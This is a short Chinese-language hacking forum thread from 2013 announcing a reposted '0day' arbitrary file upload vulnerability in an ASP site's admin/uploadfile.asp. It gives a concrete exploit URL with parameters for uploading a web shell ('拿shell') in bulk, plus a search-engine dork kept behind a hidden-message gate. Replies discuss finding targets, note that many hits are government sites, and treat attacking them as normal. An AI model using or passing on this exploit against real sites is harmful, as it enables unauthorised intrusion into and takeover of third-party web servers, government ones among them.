2013.1.29-----任意文件上传漏洞可批量拿shell
转载的。发布一个0day,是一个任意上传漏洞。
谷歌关键字:
**** Hidden Message *****
然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp任意上传拿shell
图:
谢谢分享,来试试,, 那怎么来看他的上传路径呢? 看下是什么东东 楼主,这个关键字百度到275,但是基本都不可用啊,还是GOV的 最爱Oday了 嘿嘿 huc-安阳 发表于 2013-1-30 10:05 static/image/common/back.gif
楼主,这个关键字百度到275,但是基本都不可用啊,还是GOV的
gov的很正常 :):)看看定定